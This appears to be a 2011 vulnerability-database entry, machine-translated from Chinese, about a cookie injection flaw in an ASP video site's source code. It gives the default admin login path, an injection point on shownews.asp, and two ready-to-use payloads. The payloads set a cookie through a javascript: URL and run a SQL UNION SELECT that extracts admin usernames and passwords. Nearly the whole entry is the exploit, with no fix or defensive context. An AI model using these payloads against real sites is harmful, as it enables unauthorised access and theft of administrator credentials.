Les video AI Xin technology source cookie injection vulnerability-vulnerability warning-the black bar safety net

2011-07-09T00:00:00
ID MYHACK58:62201131185
Type myhack58
Reporter 佚名
Modified 2011-07-09T00:00:00

Description

by Mr. DzY from www.0855.tv 源码 下载 :http://www.mycodes.net/25/4585.htm Default background:admin/login. asp

Injection point:http://www. xxxx. com/shownews. asp? id=2 1 6 exp: javascript:alert(document. cookie=”id=”+escape(“2 1 6 and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin”)); Either 1 of 2 fields javascript:alert(document. cookie=”id=”+escape(“2 1 6 and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0,1 1,1 2 from admin”));